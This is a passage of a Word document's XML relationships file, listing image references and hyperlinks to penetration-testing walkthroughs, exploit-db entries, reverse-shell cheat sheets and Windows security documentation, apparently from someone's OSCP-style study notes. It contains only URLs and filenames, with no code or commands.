Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asecuritysite.com/tokens/ferdecode" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId1196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asecuritysite.com/tokens/ferdecode" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId1197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/15/sumo-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/fileless-uac-bypass-uses-windows-backup-and-restore-utility/124579/" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId1198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/fileless-uac-bypass-uses-windows-backup-and-restore-utility/124579/" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jserna4510/dc-2-walkthrough-682ae78c7ed6" TargetMode="External"/><Relationship Id="rId1199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image399.png"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/glasgow-smile-1-proving-groundswalkthrough-521b2fee1317" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image512.png"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ipcrawler.io/" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image324.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/unode/firefox_decrypt" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/security-cheatsheet/metasploit-cheat-sheet" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vaibhavc418/offensive-security-insanity-hosting-walkthrough-f036b27fcca9" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/unode/firefox_decrypt" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-stapler-464f2a8aa6dc" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.powershellgallery.com/packages/NtObjectManager/1.1.33" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-billyboss-5c69bf508e5d" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.powershellgallery.com/packages/NtObjectManager/1.1.33" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image408.png"/><Relationship Id="rId1180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image291.png"/><Relationship Id="rId1181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image419.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/main/NtObjectManager/NtTokenFunctions.ps1" TargetMode="External"/><Relationship Id="rId1182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image446.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId1183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image449.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://host.name/FUZZ" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image345.png"/><Relationship Id="rId1184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://host.name/FUZZ" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId1185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.echo.php" TargetMode="External"/><Relationship Id="rId1186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image548.png"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image555.png"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image377.png"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ishsome.medium.com/proving-ground-djinn3-walk-through-96c92bda7942" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Input_Field_Separators" TargetMode="External"/><Relationship Id="rId1189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/bbscute-write-up-walkthrough-offsec-provinggrounds-vulnhub-05bad5754e72" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image208.png"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Input_Field_Separators" TargetMode="External"/><Relationship Id="rId1136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId1378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50130" TargetMode="External"/><Relationship Id="rId1137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId1379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Fasil713/fish-pg-walkthrough-e844a4f5c4bf" TargetMode="External"/><Relationship Id="rId1138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image403.png"/><Relationship Id="rId1139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image445.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image384.png"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/exploit-database/exploitdb" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.png"/><Relationship Id="rId788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/exploit-database/exploitdb" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image352.png"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image249.png"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/squid22/PostgreSQL_RCE" TargetMode="External"/><Relationship Id="rId786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/wildcards-spare-tricks.html" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image439.png"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image417.png"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image440.png"/><Relationship Id="rId781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId1370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image470.png"/><Relationship Id="rId780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image411.png"/><Relationship Id="rId1371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId1130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793" TargetMode="External"/><Relationship Id="rId1372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image278.png"/><Relationship Id="rId1131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-walla-walkthrough-2e0c33eb284b" TargetMode="External"/><Relationship Id="rId1373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hxlxmj/%EF%B8%8F-spidersociety-a-full-walkthrough-395ed6cd13f4" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbiosX/Default-Credentials/blob/master/PostgreSQL-Default-Password-List.md" TargetMode="External"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image518.png"/><Relationship Id="rId1132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xffsec.com/handbook/shells/restricted-shells/" TargetMode="External"/><Relationship Id="rId1374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bdsalazar/proving-grounds-nibbles-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-918727ec6b25" TargetMode="External"/><Relationship Id="rId784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-zipper-proving-ground-practice-31be416094b8" TargetMode="External"/><Relationship Id="rId1133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xffsec.com/handbook/shells/restricted-shells/" TargetMode="External"/><Relationship Id="rId1375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-dvr4-walkthrough-b97374d3733f" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId1134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jserna4510/dc-2-walkthrough-682ae78c7ed6" TargetMode="External"/><Relationship Id="rId1376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-dvr4-97f47b09bdc9" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.png"/><Relationship Id="rId782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image525.png"/><Relationship Id="rId1135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId1377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45296" TargetMode="External"/><Relationship Id="rId1125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId1367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image438.png"/><Relationship Id="rId1126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image486.png"/><Relationship Id="rId1368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abyssal_bloom/proving-grounds-bitforge-walkthrough-oscp-9aeb4fed4080" TargetMode="External"/><Relationship Id="rId1127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image421.png"/><Relationship Id="rId1369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@gayemans1003/offsec-proving-grounds-zab-walkthrough-4092a2c8c904" TargetMode="External"/><Relationship Id="rId1128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-play-pwned1-walkthrough-651ce326d091" TargetMode="External"/><Relationship Id="rId1129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image487.png"/><Relationship Id="rId778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sudsy-fireplace-912.notion.site/Pebbles-from-Proving-Grounds-without-SQLMap-by-Luis-Moret-lainkusanagi-23b29df77e6946a6bb8cb213a76a9ac8" TargetMode="External"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/1518" TargetMode="External"/><Relationship Id="rId776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@tacitPanda/sams-ctf-writeup-offsec-proving-grounds-ffacc098282b" TargetMode="External"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image385.png"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/1518" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image315.png"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image545.png"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId1360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/vmdak-proving-grounds-9c8a2bc4960a" TargetMode="External"/><Relationship Id="rId1361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/52017" TargetMode="External"/><Relationship Id="rId1120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId1362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@tacitPanda/sams-ctf-writeup-offsec-proving-grounds-ffacc098282b" TargetMode="External"/><Relationship Id="rId774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image234.png"/><Relationship Id="rId1121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://courses.tib3rius.com/courses/linux-privilege-escalation-for-oscp-beyond/lectures/43490109" TargetMode="External"/><Relationship Id="rId1363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/vmdak-proving-grounds-9c8a2bc4960a" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-70-proving-grounds-roquefort-4328214f4da3" TargetMode="External"/><Relationship Id="rId1122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId1364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/godylockz/CVE-2024-23897" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image561.png"/><Relationship Id="rId1123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/blogger-walkthrough-a6d064b8608e" TargetMode="External"/><Relationship Id="rId1365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-61-proving-grounds-lavita-05d148d4fbfc" TargetMode="External"/><Relationship Id="rId1124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId1366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId1158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://belcyber.medium.com/dc-9-walkthrough-vulnhub-b87a63c7d6f9" TargetMode="External"/><Relationship Id="rId1159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image280.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/23/shakabrah-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.stackexchange.com/questions/146757/cannot-figure-out-how-to-bypass-this-function-for-lfi" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://muzec0318.github.io/posts/PG/assertion101.html" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1RhQmUIfMuqZH7pFYgjnknrBvujfXIy3KbHfP1YIMHg4/edit?tab=t.0#heading=h.po7210r2o4xv" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mthbernardes/rsg" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1eQuumOf-4w7p0vGKRx-f9MmRgVOLEM2Ra5TsvgJv4h0/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId1390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roughiz/lfito_rce?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId1150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@rzashirinov38/driftingblues-6-vulnhub-walkthrough-8db6ecdb3b46" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId1151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId1152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sumo-81-100-7de98134702" TargetMode="External"/><Relationship Id="rId1153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image281.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@MEGAZORDI/oscp-practice-proving-grounds-fired-99745bfe2977" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Fasil713/fish-pg-walkthrough-e844a4f5c4bf" TargetMode="External"/><Relationship Id="rId1154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-dvr4-walkthrough-b97374d3733f" TargetMode="External"/><Relationship Id="rId1155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-medjed-7570cbbea087" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@kism37/spx-offsecpg-walkthrough-765be7d9a717" TargetMode="External"/><Relationship Id="rId1156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image343.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-slort-4225caca9373" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angelica.gitbook.io/hacktricks/pentesting-web/file-inclusion/lfi2rce-via-phpinfo" 